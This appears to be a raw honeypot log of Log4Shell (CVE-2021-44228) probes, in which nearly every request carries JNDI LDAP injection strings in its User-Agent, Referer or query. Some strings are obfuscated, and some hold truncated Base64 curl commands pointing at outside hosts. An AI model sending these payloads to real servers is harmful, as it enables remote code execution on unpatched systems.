    Referer: https://www.sshd-honeypot13/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-12 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://www.sshd-honeypot13/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-12 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://sshd-honeypot13/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-12 47.251.46.249
    URL: GET /shop/admin/ppcorg
    Referer: https://sshd-honeypot13/shop/admin/ppcorg
    User Agent: ${jndi:ldap://158.69.204.95:1389/Basic/Command/Base64/KGN1cmwgLVMgaHR0cHM6Ly93d3cuZWNvbi1qb2JzLmNvbS

2021-12-12 45.155.205.233
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMz
    Referer: http://sshd-honeypot4?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMz
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 134.209.82.14
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 134.209.82.14
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 64.227.67.110
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 64.227.67.110
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /wp-content/uploads/2019/10/favicon-32x32.jpg
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /wp-content/uploads/2019/10/favicon-32x32.jpg
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /blog/
    Referer: -
    User Agent: ${jndi:$lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.48.173
    URL: GET /blog/
    Referer: -
    User Agent: ${jndi:$lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2FID--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpco
    Referer: ${jndi:ldap://REFF--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://UA--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpcollaborator.net/a}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2FID--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpco
    Referer: ${jndi:ldap://REFF--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://UA--domain-org--19541.v40znss9rb99y6dusgx2zgdp9gf73w.burpcollaborator.net/a}

2021-12-12 159.89.85.91
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.85.91
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.85.91
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.85.91
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.8.39
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.8.39
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.8.39
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.8.39
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.156.13
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.156.13
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.203.58.73
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.203.58.73
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.203.58.73
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.203.58.73
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net%2
    Referer: ${jndi:ldap://19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net/a}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net%2
    Referer: ${jndi:ldap://19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://19541.jaxtp3b4tqkz442ydd9bbtcwyn4is7.burpcollaborator.net/a}

2021-12-12 68.183.36.244
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 68.183.36.244
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jnd:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: https://x.y.168.10:443/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMT
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: https://x.y.169.253:443/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuM
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: http://x.y.169.253:80/?x=${jnd:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: http://a.b.c.d:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjI
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /guides//
    Referer: https://sshd-honeypot1/
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: http://x.y.168.253:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 45.155.205.233
    URL: GET /
    Referer: http://140.82.47.4:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Bas

2021-12-12 137.184.111.180
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 137.184.111.180
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 137.184.111.180
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 137.184.111.180
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.179.141
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.179.141
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.179.141
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.179.141
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.146.147
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.146.147
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net%2
    Referer: ${jndi:ldap://19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net/a}

2021-12-12 106.214.174.66
    URL: GET /?id=%24%7Bjndi%3Aldap%3A%2F%2F19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net%2
    Referer: ${jndi:ldap://19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net/a}
    User Agent: ${jndi:ldap://19541.qrlhwwy2trad642q5ro6dxrwtnzgn5.burpcollaborator.net/a}

2021-12-12 161.35.119.60
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 161.35.119.60
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 165.232.80.22
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 165.232.80.22
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}$lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 46.101.223.115
    URL: GET /
    Referer: http://x.y.169.253/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 159.89.122.19
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.122.19
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.122.19
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.122.19
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.97.205
    URL: GET /
    Referer: http://140.82.47.4/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 139.59.97.205
    URL: GET /
    Referer: http://140.82.47.4/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 138.197.108.154
    URL: GET /
    Referer: http://a.b.c.d/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 138.197.108.154
    URL: GET /
    Referer: http://a.b.c.d/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 139.59.101.242
    URL: GET /
    Referer: http://x.y.168.253/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 139.59.101.242
    URL: GET /
    Referer: http://x.y.168.253/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D
    User Agent: Kryptos

2021-12-12 46.101.223.115
    URL: GET /
    Referer: http://x.y.169.253/
    User Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}

2021-12-12 188.166.102.47
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a$lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 188.166.102.47
    URL: GET /
    Referer: -
    User Agent: ${jndi:$lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 139.59.97.205
    URL: GET /
    Referer: http://140.82.47.4/
    User Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}

2021-12-12 139.59.97.205
    URL: GET /
    Referer: http://140.82.47.4/
    User Agent: ${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}

2021-12-12 147.182.154.110
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.154.110
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.154.110
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.154.110
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.154.110
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 147.182.154.110
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.193.220
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.193.220
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.193.220
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.133.216
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.133.216
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.133.216
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 138.197.216.230
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.64
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}
    User Agent:

2021-12-12 159.89.154.64
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.64
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.102
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.64
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}
    User Agent:

2021-12-12 159.89.154.64
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.64
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.185
    URL: GET /
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

2021-12-12 159.89.154.64
    URL: GET /wp-includes/images/w-logo-blue-white-bg.png
    Referer: -${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}
    User Agent:

2021-12-12 159.89.154.64
    URL: GET /favicon.ico
    Referer: -
    User Agent: ${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}

